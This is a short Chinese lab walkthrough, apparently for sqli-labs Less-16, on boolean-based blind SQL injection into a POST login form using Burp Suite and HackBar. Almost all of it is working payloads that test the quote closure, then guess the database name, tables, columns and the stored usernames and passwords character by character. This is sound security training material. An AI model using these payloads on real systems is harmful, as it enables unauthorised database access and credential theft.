Less-16 布尔盲注
利用burp suite进行抓包
利用hackba插件中的post data进行注入
方法一:布尔盲注
判断注入点:
uname=") or 1=1 # &passwd=&submit=Submit 显示登录成功,说明闭合方式为(“”),存在注入漏洞
猜解当前数据库名:
猜解数据库名长度:
uname=") or length(database())>5# &passwd=&submit=Submit
第一个字母:uname=") or ascii(substr(database(),1,1))>100 # &passwd=&submit=Submit
判断security库中的表名:
第一个表的第一个字母:
uname=") or ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))>10 # &passwd=&submit=Submit
猜解users表中的字段:
第一个字段的第一个字母:
uname=") or ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),1,1))>10 # &passwd=&submit=Submit
猜解username字段的信息:
uname=") or ascii(substr((select username from security.users limit 0,1),1,1))>10 # &passwd=&submit=Submit
猜解password字段的信息:
uname=") or ascii(substr((select password from security.users limit 0,1),1,1))>10 # &passwd=&submit=Submit